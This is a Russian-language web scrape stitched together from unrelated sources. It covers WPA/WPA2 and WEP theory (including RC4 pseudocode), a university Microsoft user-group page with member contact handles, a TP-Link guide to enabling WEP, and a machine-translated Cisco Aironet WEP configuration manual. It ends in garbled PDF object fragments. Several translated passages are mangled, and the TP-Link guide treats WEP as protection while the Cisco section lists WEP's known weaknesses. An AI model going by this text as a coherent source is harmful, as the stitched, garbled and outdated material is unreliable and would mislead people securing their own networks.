Основные организации, участвующие в разработке и продвижении стандартов Wi-Fi, в лице ассоциаций Wi-Fi Alliance и IEEE, не дожидаясь ратификации стандарта IEEE 802.11i, в ноябре 2002г. анонсировали спецификацию Wi-Fi Protected Access (WPA), соответствие которой обеспечивает совместимость оборудования различных производителей. В последующем WPA стал составной частью стандарта IEEE 802.11i.

Новый стандарт безопасности WPA обеспечил уровень безопасности куда больший, чем может предложить WEP, и имеет то преимущество, что микропрограммное обеспечение более старого оборудования может быть заменено без внесения аппаратных изменений.

А позже был разработан и утвержден стандарт WPA2, обеспечивающий еще более высокий уровень безопасности, чем первая версия WPA.

WPA/WPA2 (Wi-Fi Protected Access, защищенный доступ Wi-Fi) представляет собой обновленную программу сертификации устройств беспроводной связи. Преимуществами WPA являются усиленная безопасность данных и ужесточенный контроль доступа к беспроводным сетям. Изначально WPA основывался на протоколе TKIP (Temporal Key Integrity Protocol), использующий метод шифрования RC4. Между тем WPA2 задействует новый метод шифрования CCMP (Counter-Mode with CBC-MAC Protocol), основанный на более мощном, чем RC4, алгоритме шифрования AES (Advanced Encryption Standard). CCMP является обязательной частью стандарта WPA2 и необязательной частью стандарта WPA. Кроме того, в WPA/WPA2 обеспечена поддержка стандартов IEEE 802.1х, протокола EAP (Extensible Authentication Protocol – расширяемый протокол аутентификации) и проверка целостности сообщений MIC (Message Integrity Check).

Wi-Fi Alliance дает следующую формулу для определения сути WPA:

WPA = IEEE 802.1X + TKIP + EAP + MIC

Из этой формулы видно, что WPA, по сути, является суммой нескольких технологий.

Стандарт IEEE 802.1x не требует обязательной смены ключей шифрования одноадресной рассылки. Кроме того, в стандартах IEEE 802.11 и IEEE 802.1x не определены механизмы изменения открытого ключа шифрования, который используется для многоадресного и широковещательного трафика. В WPA требуется смена обоих ключей. В случае использования ключа одноадресной рассылки протокол TKIP (Temporal Key Integrity Protocol) изменяет ключ для каждого кадра, а изменение синхронизируется между беспроводным клиентом и точкой беспроводного доступа. Для общего ключа шифрования в WPA включены средства передачи измененного ключа от точки беспроводного подключения к клиентам.

TKIP отвечает за увеличение размера ключа с 40 до 128 бит, а также за замену одного статического ключа WEP-ключами, которые автоматически генерируются и рассылаются сервером аутентификации. Кроме того, в TKIP используется специальная иерархия ключей и методология управления ключами, которая убирает излишнюю предсказуемость, которая использовалась для несанкционированного снятия защиты WEP-ключей.

Сервер аутентификации после получения сертификата от пользователя использует 802.1х для генерации уникального базового ключа для сеанса связи. TKIP осуществляет передачу сгенерированного ключа пользователю и точке доступа, после чего выстраивает иерархию ключей плюс систему управления. Для этого используется двусторонний ключ для динамической генерации ключей шифрования данных, которые в свою очередь используются для шифрования каждого пакета данных. Подобная иерархия ключей TKIP заменяет один ключ WEP (статический) на 500 миллиардов возможных ключей, которые будут использованы для шифрования данного пакета данных.

Как упомянуто выше, в стандарте WPA используется расширяемый протокол аутентификации EAP как основа для механизма аутентификации пользователей. Непременным условием аутентификации является предъявление пользователем свидетельства, подтверждающего его право на доступ в сеть. Для этого права пользователь проходит проверку по специальной базе зарегистрированных пользователей. Без аутентификации работа в сети для пользователя будет запрещена.

WPA может работать в двух режимах: Enterprise (корпоративный) и Pre-Shared Key (персональный).

В первом случае, хранение базы данных и проверка аутентичности по стандарту IEEE 802.1x в больших сетях обычно осуществляются специальным сервером, чаще всего RADIUS.

Во втором случае подразумевается применение WPA всеми категориями пользователей беспроводных сетей, т.е. имеет упрощенный режим, не требующий сложных механизмов. Этот режим называется WPA-PSK (Pre-Shared Key) и предполагает введение одного пароля на каждый узел беспроводной сети (точку доступа, беспроводной маршрутизатор, клиентский адаптер, мост). До тех пор пока пароли совпадают, клиенту будет разрешен доступ в сеть. Можно заметить, что подход с использованием пароля делает WPA-PSK уязвимым для атаки методом подбора, однако этот режим избавляет от путаницы с ключами WEP, заменяя их целостной и четкой системой на основе цифробуквенного пароля.

Другим важным механизмом аутентификации является проверка целостности сообщений MIC (Message Integrity Check). Ее используют для предотвращения перехвата пакетов данных, содержание которых может быть изменено, а модифицированный пакет вновь передан по сети. MIC построена на основе мощной математической функции, которая применяется на стороне отправителя и получателя, после чего сравнивается результат. Если проверка показывает на несовпадение результатов вычислений, данные считаются ложными и пакет отбрасывается. Благодаря такому механизму могут быть ликвидированы слабые места защиты, способствующие проведению атак с использованием поддельных фреймов и манипуляцией битами.

Даже не принимая во внимания тот факт, что WEP не обладает какими-либо механизмами аутентификации пользователей как таковой, его ненадёжность состоит, прежде всего, в криптографической слабости алгоритма шифрования. Стандарт WPA/WPA2 позволяет использовать алгоритм AES – симметричный алгоритм блочного шифрования (размер блока 128 бит, ключ 128/192/256 бит).

CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol – протокол блочного шифрования с кодом аутентичности сообщения и режимом сцепления блоков и счётчика) – протокол шифрования IEEE 802.11i, созданный для замены TKIP – обязательного протокола шифрования в WPA и WEP – как более надёжный вариант. CCMP, являясь частью стандарта 802.11i, использует алгоритм AES. В отличие от TKIP, управление ключами и целостностью сообщений осуществляется одним компонентом, построенным вокруг AES с использованием 128-битного ключа, 128-битного блока, в соответствии со стандартом шифрования FIPS-197.

Стандарт IEEE 802.11i использует концепцию повышенной безопасности (Robust Security Network, RSN), и это потребует изменений в аппаратной части и программном обеспечении, т.е. сеть, полностью соответствующая RSN, станет несовместимой с существующим оборудованием WEP. Сейчас пока еще поддерживается как оборудование RSN, так и WEP (на самом деле WPA/TKIP было решением, направленным на сохранение инвестиций в оборудование), но в дальнейшем устройства WEP перестанут использоваться.

IEEE 802.11i применим к различным сетевым реализациям и может задействовать TKIP, но по умолчанию RSN использует AES (Advanced Encryption Standard) и CCMP (Counter Mode CBC MAC Protocol) и, таким образом, является более мощным расширяемым решением (AES – блочный шифр, оперирующий блоками данных по 128 бит).

802.11i (WPA2) – это наиболее устойчивое и безопасное решение, предназначенное в первую очередь для больших предприятий, где управление ключами и администрирование были главной головной болью. С 13 марта 2006 года поддержка WPA2 является обязательным условием для всех сертифицированных Wi-Fi устройств.

Производительность канала связи, как свидетельствуют результаты тестирования оборудования различных производителей, падает на 5-20% при включении как WEP-шифрования, так и WPA. Однако испытания того оборудования, в котором включено шифрование AES вместо TKIP, не показали сколько-нибудь заметного падения скорости.

WPA2, так же как и WPA, может работать в двух режимах: Enterprise (корпоративный) и Pre-Shared Key (персональный).

НОУ ИНТУИТ | Лекция | Протоколы безопасности беспроводных сетей

Аннотация: Продолжая рассматривать тему безопасности беспроводных сетей, остановимся более подробно на механизмах шифрования. Основное внимание уделено механизму шифрования WEP: его особенностям и уязвимостям. Подробно описываются принципы активных и пассивных сетевых атак, потоковое и блочное шифрования. Каждый метод имеет свои плюсы и минусы; о которых рассказывается в данной лекции.

Существует множество технологий безопасности, и все они предлагают решения для важнейших компонентов политики в области защиты данных: аутентификации, поддержания целостности данных и активной проверки. Мы определяем аутентификацию как аутентификацию пользователя или конечного устройства (клиента, сервера, коммутатора, маршрутизатора, межсетевого экрана и т. д.) и его местоположения с последующей авторизацией пользователей и конечных устройств.

Целостность данных включает такие области, как безопасность сетевой инфраструктуры, безопасность периметра и конфиденциальность данных. Активная проверка помогает удостовериться в том, что установленная политика в области безопасности соблюдается, и отследить все аномальные случаи и попытки несанкционированного доступа.

Механизм шифрования WEP

RC4 — фактически класс алгоритмов, определяемых размером его блока. Этот параметр n является размером слова для алгоритма. Обычно, n = 8, но в целях анализа можно уменьшить его. Однако для повышения уровня безопасности необходимо задать большее значение этой величины. Внутреннее состояние RC4 состоит из массива размером 2ⁿ слов и двух счетчиков, каждый размером в одно слово. Массив известен как S-бокс, и далее он будет обозначаться как S. Он всегда содержит перестановку 2ⁿ возможных значений слова. Два счетчика обозначены через i и j.

Алгоритм инициализации RC4 приведен ниже.

Начальное заполнение массива:
```
for i = 0 to 2ⁿ – 1
    {
        S[i] = i
    }
```
Скрэмблирование:
```
j = 0;
for i = 0 to 2ⁿ – 1
{
   j = (j + S[i] + Key[i mod l]) mod 2ⁿ
   Перестановка (S[i], S[j])
}
```
Генератор ключевого потока RC4 переставляет значения, хранящиеся в S, и каждый раз выбирает новое значение из S в качестве результата. В одном цикле RC4 определяется одно n-битное слово K из ключевого потока, которое в дальнейшем суммируется с исходным текстом для получения зашифрованного текста.
Инициализация:

Цикл генерации:

i = (i + 1) mod 2ⁿ
 j = (j + S[i]) mod 2ⁿ
Перестановка (S[i], S[j])
Результат: K = S[(S[i] + S[j]) mod 2ⁿ]

Особенности WEP-протокола:

Достаточно устойчив к атакам, связанным с простым перебором ключей шифрования, что обеспечивается необходимой длиной ключа и частотой смены ключей и инициализирующего вектора;
Самосинхронизация для каждого сообщения. Это свойство является ключевым для протоколов уровня доступа к среде передачи, где велико число искаженных и потерянных пакетов;
Эффективность: WEP легко реализовать;
Открытость;
Использование WEP-шифрования не является обязательным в сетях стандарта IEEE 802.11.

Для непрерывного шифрования потока данных используется потоковое и блочное шифрование.

Потоковое шифрование

При потоковом шифровании выполняется побитовое сложение по модулю 2 (функция «исключающее ИЛИ», XOR ) ключевой последовательности, генерируемой алгоритмом шифрования на основе заранее заданного ключа, и исходного сообщения. Ключевая последовательность имеет длину, соответствующую длине исходного сообщения, подлежащего шифрованию ( рис. 8.1).

Рис. 8.1. Потоковое шифрование

Развертывание инфраструктуры Microsoft / МГУПИ User Group

Наше сообщество специализируется на продуктах и технологиях Microsoft, по большей части на темах, интересных IT-специалистам — быстрое развертывание инфраструктуры, автоматизация управления инфраструктурой, администрирование сетей, информационная безопасность. Не оставлены без внимаия и темы, интересные разработчикам — новейшие платформы Windows 8, Windows Phone 7 и Windows 10.

Наша группа Вконтакте

Наш Твиттер

Активное участие в жизни сообщества даст вам:
— Обмен опытом в сфере ИТ
— Общение с интересными людьми
— Возможность первыми узнавать о новых технологиях Microsoft и тестировать их
— Возможность первыми узнавать об акциях, проводимых Microsoft
— Лицензионный софт от Microsoft — бесплатно
— Получать фирменные подарки

Мы проводим мероприятия, посвященные продуктам и технологиям Microsoft в МГУПИ, как в формате очных мероприятий, так и онлайн-семинары.

Наша команда

Львов Никита
Обращаться по общим вопросам, вопросам сотрудничества, организации IT-мероприятий, и прочим.
Microsoft Certified Technology Specialist, Microsoft Student Partner.
Кафедра ПР-7. Ауд. 212
Электронная почта: [email protected]
Lync: [email protected]
Skype: black___master
ICQ: 398773348

Красовская Наталья
Microsoft Student Partner Volunteer
Кафедра ИТ-5
Обращаться по вопросам и предложениям касательно работы веб-сайта, а также оформления сопроводительного медиаконетента мероприятий

Бубнов Дмитрий
Microsoft Student Partner Volunteer
Кафедра ИТ-5
Обращаться по вопросам фото\видео поддержки мероприятий, а также маркетинга мероприятий

Мальцева Дарья
Кафедра ИТ-5
Обращаться по вопросам SEO, маркетинга, и информационных рассылок

Хрузина Мария
Обращаться по вопросам получения бесплатного ПО
Кафедра ИТ-6
Skype: it-bel4onok

Как мне защитить мою беспроводную сеть с помощью режима шифрования WEP на маршрутизаторе стандарта G от компании TP-Link?

Шаг 1 Откройте веб-браузер и введите IP -адрес маршрутизатора (по умолчанию 192.168.1.1) в адресную строку и затем нажмите Enter .

Шаг 2 На станице входа введите имя пользователя и пароль, значения имени пользователя и пароль по умолчанию — admin .

Шаг 3 Нажмите Беспроводная сеть->Настройки беспроводной сети слева, чтобы открыть страницу настроек беспроводной связи.

Шаг 4 Включите “Включить защиту беспроводной сети”, измените Тип защиты на WEP . Выбор защиты и Формат ключа WEP могут остаться как в настройках по умолчанию.

Шаг 5 Выберите ключ. Есть 4 ключа, вы можете воспользоваться любым. Ради примера мы выбираем Ключ 2.

Измените Тип ключа от значения Отключено до 128 bit , введите в поле ключа WEP ключ (пароль).

Шаг 6 Нажмите на кнопку Сохранить, чтобы сохранить настройки.

Примечание :

1. Если вы включили Беспроводную защиту, но не установили ключ или ваш ключ короче необходимой длины ключа, функция беспроводной защиты не будет активна, даже если вы выбрали ключ совместного пользования как тип аутентификации.

2. Если был установлен WEP , вам нужно настроить таким же образом или ввести тот же пароль/ключ на клиенте, чтобы подключиться к беспроводной сети (маршрутизатору).

3. Если вы выбираете шестнадцатеричный или ASCII как формат ключа WEP, обратите внимание на длину ключа, убедитесь в том, что ваш ключ соответствует длине ключа .

Для 64-битного шифрования – Вы можете ввести 10 шестнадцатеричных цифр (любая комбинация из цифр и символов 0-9, a — f , A — F , нулевой ключ не разрешается) или 5 цифр в формате ASCII .

Для 128-битного шифрования – Вы можете ввести 26 шестнадцатеричных цифр (любая комбинация из цифр и символов 0-9, a — f , A — F , нулевой ключ не разрешается) или 13 цифр в формате ASCII .

Для 152-битного шифрования – Вы можете ввести 32 шестнадцатеричных цифр (любая комбинация из цифр и символов 0-9, a — f , A — F , нулевой ключ не разрешается) или 16 цифр в формате ASCII .

Смотрите также :

Как мне выполнить базовые настройки беспроводной сети на беспроводном маршрутизаторе от TP — LINK ?

Как мне защитить мою беспроводную сеть с помощью режима шифрования WPA — PSK / WPA 2- PSK на беспроводном маршрутизаторе от TP — LINK ?

Как мне подключиться к беспроводной сети с помощью встроенной в ОС Windows утилиты/клиента ( WZC )?

Пример

проводной эквивалентной конфиденциальности (WEP) в точках конфигурации и точках доступа Aironet

В этом документе представлены способы настройки WEP-шифрования в компонентах беспроводной сети Cisco Aironet (WLAN).

Примечание: Обратитесь к разделу Static Web Keys главы 6 — Настройка WLAN для получения дополнительной информации о конфигурации WEP на контроллерах беспроводной локальной сети (WLC).

WEP — это алгоритм шифрования, встроенный в 802.11 (Wi-Fi) стандарт. WEP-шифрование использует потоковый шифр Ron’s Code 4 (RC4) с 40- или 104-битными ключами и 24-битным вектором инициализации (IV).

Как указано в стандарте, WEP использует алгоритм RC4 с 40-битным или 104-битным ключом и 24-битным IV. RC4 является симметричным алгоритмом, поскольку он использует один и тот же ключ для шифрования и дешифрования данных. Когда WEP включен, у каждой радиостанции есть ключ. Ключ используется для шифрования данных перед передачей данных по эфиру.Если станция принимает пакет, который не скремблирован с помощью соответствующего ключа, пакет отбрасывается и никогда не доставляется на хост.

WEP может использоваться в основном для домашнего офиса или небольшого офиса, который не требует очень строгой безопасности.

Реализация Aironet WEP в аппаратном обеспечении. Поэтому при использовании WEP минимальное влияние на производительность.

Примечание: Существуют некоторые известные проблемы с WEP, что делает его не надежным методом шифрования.Вопросы:

Существует большое количество административных накладных расходов для поддержки общего ключа WEP.
WEP имеет ту же проблему, что и все системы на основе общих ключей. Любой секрет, переданный одному человеку, становится общедоступным по истечении определенного периода времени.
IV, который заполняет алгоритм WEP, отправляется в виде открытого текста.
Контрольная сумма WEP является линейной и предсказуемой.

Протокол целостности временного ключа (TKIP) был создан для решения этих проблем WEP.Как и в WEP, TKIP использует шифрование RC4. Однако TKIP расширяет WEP, добавляя такие меры, как хеширование ключей для каждого пакета, проверка целостности сообщений (MIC) и ротация широковещательных ключей для устранения известных уязвимостей WEP. TKIP использует потоковый шифр RC4 с 128-битными ключами для шифрования и 64-битными ключами для аутентификации.

Требования

В этом документе предполагается, что вы можете установить административное соединение с устройствами WLAN и что эти устройства нормально работают в незашифрованной среде.

Для настройки стандартного 40-битного WEP у вас должно быть два или более радиоустройства, которые взаимодействуют друг с другом.

Примечание: Продукты Aironet могут устанавливать 40-битные соединения WEP с продуктами, совместимыми с IEEE 802.11b, не Cisco. Этот документ не касается конфигурации других устройств.

Для создания 128-битного канала WEP продукты Cisco взаимодействуют только с другими продуктами Cisco.

Используемые компоненты

Используйте эти компоненты с этим документом:

Информация в этом документе была создана с устройств в определенной лабораторной среде.Все устройства, используемые в этом документе, были запущены с очищенной (по умолчанию) конфигурацией. Если ваша сеть работает, убедитесь, что вы понимаете потенциальное влияние любой команды.

Конвенции

См. Технические рекомендации Cisco для получения дополнительной информации об условных обозначениях.

Точки доступа Aironet с операционной системой VxWorks

Выполните эти шаги:

Выполните подключение к точке доступа (AP).
Перейдите в меню AP Radio Encryption.
Используйте один из следующих путей:
- Сводная информация Статус> Настройка> AP Radio / Hardware> Шифрование радиоданных (WEP)> AP Radio Encryption
- Сводная информация Статус> Настройка> Безопасность> Настройка безопасности: шифрование радиоданных (WEP)> AP Radio Encryption
Примечание: Чтобы внести изменения в эту страницу, вы должны быть администратором с возможностями идентификации и записи.
Веб-браузер Представление меню шифрования AP Radio Data

VxWorks Настройки

На странице AP Radio Data Encryption представлены различные варианты использования. Некоторые параметры являются обязательными для WEP. В этом разделе отмечены эти обязательные параметры. Для работы WEP не нужны другие параметры, но они рекомендуются.

Использование шифрования данных станциями:
Используйте этот параметр, чтобы выбрать, должны ли клиенты использовать шифрование данных при связи с точкой доступа.В раскрывающемся меню перечислены три параметра:
- Без шифрования (по умолчанию) — требует, чтобы клиенты связывались с точкой доступа без какого-либо шифрования данных. Этот параметр не рекомендуется.
- Необязательно — позволяет клиентам обмениваться данными с точкой доступа с шифрованием данных или без него. Как правило, вы используете эту опцию, когда у вас есть клиентские устройства, которые не могут установить WEP-соединение, например, клиенты не от Cisco в 128-битной среде WEP.
- Полное шифрование (РЕКОМЕНДУЕТСЯ) — требует, чтобы клиенты использовали шифрование данных при обмене данными с точкой доступа. Клиенты, которые не используют шифрование данных, не могут общаться. Эта опция рекомендуется, если вы хотите максимизировать безопасность вашей WLAN.
Примечание: Вы должны установить ключ WEP перед включением шифрования. См. Раздел ключа шифрования (ОБЯЗАТЕЛЬНО) этого списка.
Принять типы аутентификации
Можно выбрать «Открыть», «Общий ключ» или оба этих параметра, чтобы установить аутентификации, которые распознает точка доступа.
- Открыть (РЕКОМЕНДУЕТСЯ) — эта настройка по умолчанию позволяет любому устройству, независимо от его ключей WEP, проходить проверку подлинности и пытаться установить связь.
- Shared Key — этот параметр указывает AP отправлять простой текстовый запрос общего ключа на любое устройство, которое пытается связаться с AP.
  Примечание: Этот запрос может оставить точку доступа открытой для атаки по известному тексту от злоумышленников. Поэтому этот параметр не так безопасен, как параметр «Открыть».
Передача с ключом
Эти кнопки позволяют выбрать ключ, который точка доступа использует во время передачи данных. Вы можете выбрать только одну клавишу за раз. Любой или все установленные ключи могут быть использованы для получения данных. Вы должны установить ключ, прежде чем указывать его в качестве ключа передачи.
Ключ шифрования (ОБЯЗАТЕЛЬНО)
Эти поля позволяют вводить ключи WEP. Введите 10 шестнадцатеричных цифр для 40-битных ключей WEP или 26 шестнадцатеричных цифр для 128-битных ключей WEP.Ключи могут быть любой комбинацией этих цифр:
В целях защиты безопасности ключей WEP существующие ключи WEP не отображаются в виде текста в полях ввода. В последних версиях AP вы можете удалить существующие ключи. Однако вы не можете редактировать существующие ключи.
Примечание: Вы должны точно так же настроить ключи WEP для своей сети, точек доступа и клиентских устройств. Например, если вы установите WEP-ключ 3 на AP на 0987654321 и выберите этот ключ в качестве активного ключа, вы также должны установить WEP-ключ 3 на клиентском устройстве на то же значение.
Размер ключа (ОБЯЗАТЕЛЬНО)
Этот параметр устанавливает ключи на 40-битный или 128-битный WEP. Если для этого выбора отображается «не установлено», ключ не установлен.
Примечание: Вы не можете удалить ключ, выбрав «не установлено».
Кнопки действий
Четыре кнопки управления настройками. Если в вашем веб-браузере включен JavaScript, всплывающее окно подтверждения появляется после нажатия любой кнопки, кроме «Отмена».
- Применить — эта кнопка активирует новые настройки значений. Браузер остается на странице.
- OK — эта кнопка применяет новые настройки и возвращает браузер на главную страницу настройки.
- Отмена — эта кнопка отменяет изменения настроек и возвращает настройки к ранее сохраненным значениям. Затем вы вернетесь на главную страницу настройки.
- Восстановить значения по умолчанию — эта кнопка возвращает все настройки на этой странице к заводским настройкам по умолчанию.

Примечание: В последних версиях точек доступа Cisco IOS® для этой страницы доступны только кнопки управления Применить и Отмена .

Эмулятор терминала Вид меню шифрования данных

Эмулятор терминала Представление последовательности конфигурации ключа WEP (программное обеспечение Cisco IOS®)

точек доступа Aironet, на которых установлено программное обеспечение Cisco IOS
Выполните эти шаги:
Выполните подключение к точке доступа.
В пункте меню SECURITY в левой части окна выберите Encryption Manager для радиоинтерфейса, для которого вы хотите настроить статические ключи WEP.
Веб-браузер Представление меню AP Security Encryption Manager

Если вы используете VxWorks, выполните следующие действия:
Установите соединение с мостом.
Перейдите в меню конфиденциальности.
Выберите Главное меню> Конфигурация> Радио> I80211> Конфиденциальность .
Меню «Конфиденциальность» контролирует использование шифрования пакета данных, который передается по радио через эфир. Алгоритм RSA RC4 и один из четырех известных ключей используются для шифрования пакетов. Каждый узел в ячейке радиосвязи должен знать все используемые ключи, но для передачи данных может быть выбран любой из ключей.
Terminal Emulator Просмотр меню конфиденциальности

Обратитесь к разделу Настройка наборов шифров и WEP — мост серии 1300 и Настройка функций WEP и WEP — Мост серии 1400 для получения информации о настройке WEP в мостах серии 1300 и 1400 через режим CLI.
Для использования графического интерфейса пользователя для настройки мостов серий 1300 и 1400 выполните ту же процедуру, описанную в точках доступа Aironet, которые запускают раздел программного обеспечения Cisco IOS этого документа.
VxWorks Настройки
В меню «Конфиденциальность» представлен набор параметров, которые необходимо настроить. Некоторые параметры являются обязательными для WEP. В этом разделе отмечены эти обязательные параметры. Для работы WEP не нужны другие параметры, но они рекомендуются.
В этом разделе представлены пункты меню в том порядке, в котором они отображаются в представлении эмулятора терминала в меню конфиденциальности.Однако настройте параметры в следующем порядке:
Ключ
Передача
Auth
Клиент
Шифрование
Конфигурация в этом порядке гарантирует, что необходимые предварительные условия установлены при настройке каждого параметра.
Это варианты:
Ключ (ОБЯЗАТЕЛЬНО)
Опция Ключа программирует ключи шифрования в Мост.Вам будет предложено установить одну из четырех клавиш. Вам дважды предлагается ввести ключ. Чтобы определить ключ, необходимо ввести 10 или 26 шестнадцатеричных цифр, которые зависят от того, предназначена ли конфигурация моста для 40-битных или 128-битных ключей. Используйте любую комбинацию из этих цифр:
Ключи должны совпадать в всех узлов в ячейке радиосвязи, и вы должны вводить ключи в том же порядке. Вам не нужно определять все четыре ключа, если количество ключей совпадает в каждом устройстве в WLAN.
Передача
Опция Передача сообщает радиостанции, какие ключи использовать для передачи пакетов. Каждая радиостанция может расшифровать полученные пакеты, отправленные с помощью любого из четырех ключей.
Auth
Вы используете опцию Auth на мостах ретранслятора, чтобы определить, какой режим аутентификации используется устройством для соединения с его родителем. Допустимые значения: Открытый или Общий ключ. 802.Протокол 11 определяет процедуру, в которой клиент должен аутентифицироваться с родителем, прежде чем клиент сможет связаться.
Открыть (РЕКОМЕНДУЕТСЯ) —Этот режим аутентификации по сути является нулевой операцией. Все клиенты могут проходить аутентификацию.
Shared Key — этот режим позволяет родителю отправлять клиенту текст запроса, который клиент шифрует и возвращает родителю. Если родитель успешно расшифровывает текст запроса, клиент проходит проверку подлинности.
Осторожно: Не используйте режим общего ключа. Когда вы используете его, текстовая и зашифрованная версия тех же данных передается в эфир. Это ничего не дает. Если пользовательский ключ неверен, устройство не расшифровывает пакеты, и пакеты не могут получить доступ к сети.
Client
Опция Client определяет режим аутентификации, который клиентские узлы используют для привязки к устройству.Это допустимые значения:
Открыть (РЕКОМЕНДУЕТСЯ) —Этот режим аутентификации по сути является нулевой операцией. Все клиенты могут проходить аутентификацию.
Shared Key — этот режим позволяет родителю отправлять клиенту текст запроса, который клиент шифрует и возвращает родителю. Если родитель успешно расшифровывает текст запроса, клиент проходит проверку подлинности.
Оба — этот режим позволяет клиенту использовать любой режим.
Шифрование
Выкл. — Если для параметра Шифрование установлено значение Выкл., Шифрование не выполняется. Данные передаются в открытом виде.
Вкл. (ОБЯЗАТЕЛЬНО) — Если для параметра Шифрование установлено значение Вкл., Все передаваемые пакеты данных шифруются, а все незашифрованные полученные пакеты отбрасываются.
Смешанный — В смешанном режиме корневой или ретрансляторный мост принимает сопоставление от клиентов, у которых шифрование включено или выключено.В этом случае шифруются только пакеты данных между узлами, которые поддерживают оба. Многоадресные пакеты отправляются в открытом виде. Все узлы могут видеть пакеты.
Осторожно: Не используйте смешанный режим. Если клиент с включенным шифрованием отправляет многоадресный пакет своему родителю, пакет шифруется. Родитель расшифровывает пакет и повторно передает пакет в открытом виде в ячейку, и другие узлы могут видеть пакет. Возможность просмотра пакета в зашифрованном и незашифрованном виде может способствовать взлому ключа.Включение смешанного режима только для совместимости с другими поставщиками.
Чтобы настроить WEP на клиентском адаптере Aironet, необходимо выполнить два основных шага:
Сконфигурируйте ключ / ключи WEP в Client Encryption Manager.
Включите WEP в клиентской утилите Aironet (ACU).
Набор ключей WEP
Выполните эти шаги для настройки ключей WEP на клиентских адаптерах:
Откройте ACU и выберите Profile Manager .
Выберите профиль, в котором вы хотите включить WEP, и нажмите Изменить .
Нажмите вкладку Network Security , чтобы отобразить параметры безопасности, и нажмите Использовать статические ключи WEP .
Это действие активирует параметры конфигурации WEP, которые недоступны, если не выбран параметр WEP.

В качестве ключа WEP, который вы хотите создать, выберите 40 бит или 128 бит в разделе Размер ключа WEP в правой части окна.
Примечание: 128-разрядные клиентские адаптеры могут использовать 40-разрядные или 128-разрядные ключи. Но 40-битные адаптеры могут использовать только 40-битные ключи.
Примечание: WEP-ключ вашего клиентского адаптера должен совпадать с WEP-ключом, который используют другие компоненты WLAN, с которыми вы общаетесь.
При установке более одного ключа WEP необходимо назначить ключи WEP одинаковым номерам ключей WEP для всех устройств. Ключи WEP должны состоять из шестнадцатеричных символов и содержать 10 символов для 40-битных ключей WEP или 26 символов для 128-битных ключей WEP.Шестнадцатеричные символы могут быть:
Примечание: AEP-текстовые ключи WEP не поддерживаются на точках доступа Aironet. Поэтому вы должны выбрать шестнадцатеричный (0-9, A-F) параметр, если вы планируете использовать свой клиентский адаптер с этими точками доступа.
Примечание: После создания ключа WEP его можно записать поверх него. Но вы не можете редактировать или удалять его.
Примечание: Если вы используете более позднюю версию Aironet Desktop Utility (ADU) вместо ACU в качестве клиентской утилиты, вы также можете удалить созданный ключ WEP и заменить его новым.
Нажмите кнопку «Передать ключ », которая находится рядом с одним из созданных вами ключей.
Этим действием вы указываете, что этот ключ является ключом, который вы хотите использовать для передачи пакетов.
Нажмите Постоянный в поле Тип ключа WEP.
Это действие позволяет клиентскому адаптеру сохранить этот ключ WEP, даже если питание адаптера отключено или при перезагрузке компьютера, на котором установлен ключ.Если вы выберете Временный для этой опции, ключ WEP теряется при отключении питания от клиентского адаптера.
Нажмите ОК .
Включить WEP
Выполните эти шаги:
Откройте ACU и выберите Изменить свойства в строке меню.
Нажмите вкладку Network Security для отображения параметров безопасности.
Установите флажок Включить WEP , чтобы активировать WEP.
Обратитесь к разделу Настройка WEP в ADU, чтобы узнать, как настроить WEP с использованием ADU в качестве клиентской утилиты.
Существуют различия между мостом рабочей группы Aironet серии 340 и мостом серии Aironet 340. Однако конфигурация моста рабочей группы для использования WEP практически идентична конфигурации моста. См. Раздел «Настройка мостов Aironet» для настройки моста.
Подключение к мосту рабочей группы.
Перейдите в меню конфиденциальности.
Выберите Main> Configuration> Radio> I80211> Privacy , чтобы получить доступ к меню Privacy VxWorks.
Настройки
В меню «Конфиденциальность» представлены настройки, перечисленные в этом разделе. Настройте параметры на мосту рабочей группы в следующем порядке:
Ключ
Передача
Auth
Шифрование
Это варианты:
Ключ
Опция Ключ устанавливает ключ WEP, который мост использует для приема пакетов.Значение должно совпадать с ключом, который использует точка доступа или другое устройство, с которым связывается мост рабочей группы. Ключ состоит из до 10 шестнадцатеричных символов для 40-битного шифрования или 26 шестнадцатеричных символов для 128-битного шифрования. Шестнадцатеричные символы могут быть любой комбинацией этих цифр:
Передача
Опция Передача устанавливает ключ WEP, который мост использует для передачи пакетов. Вы можете использовать тот же ключ, который вы использовали для параметра Ключ.Если вы выбираете другой ключ, вы должны установить соответствующий ключ на точке доступа.
Для передачи может использоваться только один ключ WEP одновременно. Ключ WEP, который вы используете для передачи данных, должен быть установлен на то же значение на мосту рабочей группы и на других устройствах, с которыми он связывается.
Аутентификация (Auth)
Параметр Auth определяет, какой метод аутентификации использует система. Варианты:
Open (РЕКОМЕНДУЕТСЯ) — настройка Open по умолчанию позволяет любому AP, независимо от его настроек WEP, проходить аутентификацию и затем пытаться установить связь с мостом.
Shared Key — этот параметр указывает мосту отправлять незашифрованный запрос общего ключа в точки доступа AP в попытке установить связь с мостом. Параметр «Общий ключ» может оставить мост открытым для атаки по известному тексту от злоумышленников. Поэтому этот параметр не так безопасен, как параметр «Открыть».
Encryption
Опция Encryption устанавливает параметры шифрования для всех пакетов данных, кроме пакетов ассоциации и некоторых управляющих пакетов.Существует четыре варианта:
Примечание: Точка доступа должна иметь активное шифрование и правильно заданный ключ.
Выкл. — это настройка по умолчанию. Все шифрование отключено. Мост рабочей группы не связывается с AP с использованием WEP.
Вкл (РЕКОМЕНДУЕТСЯ) — этот параметр требует шифрования всех передаваемых данных. Мост рабочей группы связывается только с точками доступа, которые используют WEP.
Mixed on — эта настройка означает, что мост всегда использует WEP для связи с AP. Однако точка доступа связывается со всеми устройствами, независимо от того, используют ли они WEP или не используют WEP.
Mixed off — эта настройка означает, что мост не использует WEP для связи с AP. Однако точка доступа связывается со всеми устройствами, независимо от того, используют ли они WEP или не используют WEP.
Осторожно: Если вы выберете Вкл или Смешанный в качестве категории WEP и настроите мост через радиоканал, соединение с мостом будет потеряно, если вы неправильно установите ключ WEP.Убедитесь, что вы используете точно такие же настройки при установке ключа WEP на мосту рабочей группы и ключа WEP на других устройствах в вашей беспроводной локальной сети.
,
s37wep.mif
% PDF-1.4 % 1 0 объектов > endobj 9 0 объектов > endobj 2 0 объектов > endobj 3 0 объектов > endobj 4 0 объектов > endobj 5 0 объектов > endobj 6 0 объектов > endobj 7 0 объектов > endobj 8 0 объектов > поток
s37wep.mif
ctsadmin-p.gen
endstream endobj 10 0 объектов > endobj 11 0 объектов > endobj 12 0 объектов > endobj 13 0 объектов > endobj 14 0 объектов > endobj 15 0 объектов > поток HUr6 + dL
.
